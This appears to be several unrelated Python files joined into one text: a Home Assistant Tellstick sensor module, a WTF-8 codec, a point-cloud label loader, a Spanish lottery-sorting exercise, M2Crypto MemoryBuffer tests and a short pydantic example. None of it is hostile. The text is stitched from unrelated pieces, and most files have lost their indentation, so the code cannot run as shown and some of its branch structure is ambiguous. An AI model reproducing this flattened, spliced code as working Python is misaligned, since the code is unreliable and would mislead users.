For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.tellstick/
"""
import logging
from collections import namedtuple
import homeassistant.util as util
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
DatatypeDescription = namedtuple("DatatypeDescription", ['name', 'unit'])
REQUIREMENTS = ['tellcore-py==1.1.2']
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup Tellstick sensors."""
import tellcore.telldus as telldus
import tellcore.constants as tellcore_constants
sensor_value_descriptions = {
tellcore_constants.TELLSTICK_TEMPERATURE:
DatatypeDescription(
'temperature', config.get('temperature_scale', TEMP_CELSIUS)),
tellcore_constants.TELLSTICK_HUMIDITY:
DatatypeDescription('humidity', '%'),
tellcore_constants.TELLSTICK_RAINRATE:
DatatypeDescription('rain rate', ''),
tellcore_constants.TELLSTICK_RAINTOTAL:
DatatypeDescription('rain total', ''),
tellcore_constants.TELLSTICK_WINDDIRECTION:
DatatypeDescription('wind direction', ''),
tellcore_constants.TELLSTICK_WINDAVERAGE:
DatatypeDescription('wind average', ''),
tellcore_constants.TELLSTICK_WINDGUST:
DatatypeDescription('wind gust', '')
}
try:
core = telldus.TelldusCore()
except OSError:
logging.getLogger(__name__).exception(
'Could not initialize Tellstick.')
return
sensors = []
datatype_mask = util.convert(config.get('datatype_mask'), int, 127)
for ts_sensor in core.sensors():
try:
sensor_name = config[ts_sensor.id]
except KeyError:
if util.convert(config.get('only_named'), bool, False):
continue
sensor_name = str(ts_sensor.id)
for datatype in sensor_value_descriptions:
if datatype & datatype_mask and ts_sensor.has_value(datatype):
sensor_info = sensor_value_descriptions[datatype]
sensors.append(
TellstickSensor(
sensor_name, ts_sensor, datatype, sensor_info))
add_devices(sensors)
class TellstickSensor(Entity):
"""Representation of a Tellstick sensor."""
def __init__(self, name, sensor, datatype, sensor_info):
"""Initialize the sensor."""
self.datatype = datatype
self.sensor = sensor
self._unit_of_measurement = sensor_info.unit or None
self._name = "{} {}".format(name, sensor_info.name)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self.sensor.value(self.datatype).value
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
|
# -*- coding: utf-8 -*-
# To the extent possible under law, the author of this work, Konstantinos
# Koukopoulos, has waived all copyright and related or neighboring rights to
# "Python codec for Wobbly Transformation Format - 8-bit (WTF-8)". It is
# dedicated to the public domain, as described in:
# http://creativecommons.org/publicdomain/zero/1.0/
# This work is published from Greece and is available here:
# https://gist.github.com/kouk/d4e1faababf14b09b27f
from __future__ import unicode_literals, print_function
import six
import sys
import codecs
def encode(input, errors='strict'):
""" convert from unicode text (with possible UTF-16 surrogates) to wtf-8
encoded bytes. If this is a python narrow build this will actually
produce UTF-16 encoded unicode text (e.g. with surrogates).
"""
# method to convert surrogate pairs to unicode code points permitting
# lone surrogate pairs (aka potentially ill-formed UTF-16)
def to_code_point(it):
hi = None
try:
while True:
c = ord(next(it))
if c >= 0xD800 and c <= 0xDBFF: # high surrogate
hi = c
c = ord(next(it))
if c >= 0xDC00 and c <= 0xDFFF: # paired
c = 0x10000 + ((hi - 0xD800) << 10) + (c - 0xDC00)
else:
yield hi
hi = None
yield c
except StopIteration:
if hi is not None:
yield hi
buf = six.binary_type()
for code in to_code_point(iter(input)):
if (0 == (code & 0xFFFFFF80)):
buf += six.int2byte(code)
continue
elif (0 == (code & 0xFFFFF800)):
buf += six.int2byte(((code >> 6) & 0x1F) | 0xC0)
elif (0 == (code & 0xFFFF0000)):
buf += six.int2byte(((code >> 12) & 0x0F) | 0xE0)
buf += six.int2byte(((code >> 6) & 0x3F) | 0x80)
        # four-byte sequence (code points up to U+1FFFFF)
        elif (0 == (code & 0xFFE00000)):
buf += six.int2byte(((code >> 18) & 0x07) | 0xF0)
buf += six.int2byte(((code >> 12) & 0x3F) | 0x80)
buf += six.int2byte(((code >> 6) & 0x3F) | 0x80)
buf += six.int2byte((code & 0x3F) | 0x80)
return buf, len(buf)
def decode(input, errors='strict'):
""" convert from wtf-8 encoded bytes to unicode text.
If this is a python narrow build this will actually
produce UTF-16 encoded unicode text (e.g. with surrogates).
"""
buf = []
try:
it = six.iterbytes(input)
c = None
while True:
c = next(it)
if c < 0x80:
pass
elif c < 0xE0:
c = (((c & 0x1F) << 6) +
(next(it) & 0x3F))
elif c >= 0xE0 and c <= 0xEF:
c = (((c & 0x0F) << 12) +
((next(it) & 0x3F) << 6) +
(next(it) & 0x3F))
elif c >= 0xF0 and c <= 0xF4:
c = (((c & 0x07) << 18) +
((next(it) & 0x3F) << 12) +
((next(it) & 0x3F) << 6) +
(next(it) & 0x3F))
if c >= sys.maxunicode: # use a surrogate pair
buf.append(((c - 0x10000) >> 10) + 0xD800)
c = ((c - 0x10000) & 0x3FF) + 0xDC00
else:
raise ValueError("Invalid wtf sequence")
buf.append(c)
c = None
except StopIteration:
if c is not None:
raise ValueError("Malformed WTF-8 sequence")
return six.text_type().join(map(six.unichr, buf)), len(buf)
class StreamWriter(codecs.StreamWriter):
encode = encode
class StreamReader(codecs.StreamReader):
decode = decode
def find_codec(codec_name):
if codec_name.lower() == 'wtf-8':
return (encode, decode, StreamReader, StreamWriter)
return None
codecs.register(find_codec)
if __name__ == "__main__":
codecs.register(
lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)
msg = "I \u2665 Unicode. Even broken \ud800 Unicode."
assert msg == msg.encode('wtf-8').decode('wtf-8')
msg += "And high code points \U0001F62A. And γκρήκ τέξτ."
assert msg == msg.encode('wtf-8').decode('wtf-8')
|
import math
import os
import random

import numpy as np
from PIL import Image

# NOTE: `priority` (a label-priority matrix) and `colorMap` (label index -> RGB tuple)
# are assumed to be defined elsewhere in the surrounding project; they are not part of
# this file.


class PointCloud:
    def __init__(self, ptsDir, camera=0):
        self.ptsDir = ptsDir
        self.camera = camera
        self.w = 1408
        self.h = 376

    def loadPointCloud(self, frame):
        labelDir = '%s/annotation_%010d_%d_m.dat' % (self.ptsDir, frame, self.camera)
        print('Processing %010d' % frame)
        if not os.path.isfile(labelDir):
            print(' annotation file doesnt exist')
            return None
        img = Image.new('RGB', [self.w, self.h])
        imgDL = Image.new('RGB', [self.w, self.h])
        labels = tuple(open(labelDir, 'r'))
        unarySparse = []
        sparseLabel2D = []
        offset = 6
        tupleNum = 3
        for l in labels:
            s = [float(n) for n in l.split()]
            if s[offset] != 0:
                yy = int(math.floor(s[0] / self.w))
                xx = int(s[0] % self.w)
                numCandidate = (len(s) - offset) // tupleNum
                # only feed for training when there is only one point
                candidate = []
                for i in range(numCandidate):
                    # skip the undefined label
                    if int(s[i * tupleNum + 1 + offset]) - 1 != priority.shape[0]:
                        candidate.append(int(s[i * tupleNum + 1 + offset]) - 1)
                if not candidate:
                    continue
                index = random.sample(candidate, 1)
                if numCandidate > 1:
                    subprior = priority[np.ix_(candidate, candidate)]
                    if np.std(subprior.flatten()) != 0:
                        midx = np.argmax(np.sum(subprior, axis=1))
                        index[0] = candidate[midx]
                img.putpixel((xx, yy), (colorMap[index[0] + 1][0], colorMap[index[0] + 1][1], colorMap[index[0] + 1][2]))
                # take it for training only when there is no ambiguity
                if np.std(candidate) == 0:
                    imgDL.putpixel((xx, yy), (colorMap[candidate[0] + 1][0], colorMap[candidate[0] + 1][1], colorMap[candidate[0] + 1][2]))
        return img, imgDL


if __name__ == '__main__':
    pcd = PointCloud('')
""" Escribir un programa que pregunte al usuario los números ganadores de la lotería primitiva, los almacene
en una lista y los muestre por pantalla ordenados de menor a mayor. """
num = []
x = int(input("Cuantos numero registrara? "))
while x != 0:
numero = int(input("Numero loteria: "))
num.append(numero)
if x != 0:
x = x-1
ordenados = sorted(num)
print("numero: {}".format(ordenados))
|
#!/usr/bin/env python
"""Unit tests for M2Crypto.BIO.MemoryBuffer.
Copyright (c) 2000 Ng Pheng Siong. All rights reserved."""
import os
import multiprocessing
from M2Crypto.BIO import MemoryBuffer
from tests import unittest
class TimeLimitExpired(Exception):
pass
def time_limit(timeout, func, exc_msg, *args, **kwargs):
    p = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
p.start()
p.join(timeout)
if p.is_alive():
p.terminate()
raise TimeLimitExpired(exc_msg)
class MemoryBufferTestCase(unittest.TestCase):
def setUp(self):
self.data = b'abcdef' * 64
def tearDown(self):
pass
def test_init_empty(self):
mb = MemoryBuffer()
self.assertEqual(len(mb), 0)
out = mb.read()
assert out is None
def test_init_empty_cm(self):
with MemoryBuffer() as mb:
self.assertEqual(len(mb), 0)
out = mb.read()
assert out is None
def test_init_something(self):
mb = MemoryBuffer(self.data)
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertEqual(out, self.data)
def test_init_something_result_bytes(self):
mb = MemoryBuffer(self.data)
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertIsInstance(out, bytes)
def test_init_something_cm(self):
with MemoryBuffer(self.data) as mb:
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertEqual(out, self.data)
def test_read_less_than(self):
chunk = len(self.data) - 7
mb = MemoryBuffer(self.data)
out = mb.read(chunk)
self.assertEqual(out, self.data[:chunk])
self.assertEqual(len(mb), (len(self.data)) - chunk)
def test_read_more_than(self):
chunk = len(self.data) + 8
mb = MemoryBuffer(self.data)
out = mb.read(chunk)
self.assertEqual(out, self.data)
self.assertEqual(len(mb), 0)
def test_write_close(self):
mb = MemoryBuffer(self.data)
assert mb.writeable()
mb.write_close()
assert mb.readable()
with self.assertRaises(IOError):
mb.write(self.data)
assert not mb.writeable()
def test_closed(self):
mb = MemoryBuffer(self.data)
mb.close()
with self.assertRaises(IOError):
mb.write(self.data)
assert mb.readable() and not mb.writeable()
def test_readline(self):
# test against possible endless loop
# http://stackoverflow.com/questions/9280550/
timeout_secs = 10
time_limit(timeout_secs, run_test,
'The readline() should not timeout!')
def run_test(*args, **kwargs):
sep = os.linesep.encode()
with MemoryBuffer(b'hello\nworld\n') as mb:
assert mb.readable()
assert mb.readline() == b'hello' + sep
assert mb.readline() == b'world' + sep
with MemoryBuffer(b'hello\nworld\n') as mb:
assert mb.readlines() == [b'hello' + sep, b'world' + sep]
def suite():
return unittest.TestLoader().loadTestsFromTestCase(MemoryBufferTestCase)
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
from pydantic import BaseModel
class A(BaseModel):
cde: str
xyz: str
class B(A):
cde: int
xyz: str
A(cde='abc', xyz='123')  # OK: on A both fields are declared as str
B(cde='abc', xyz='123')  # raises ValidationError: B overrides cde as int, and 'abc' cannot be coerced
|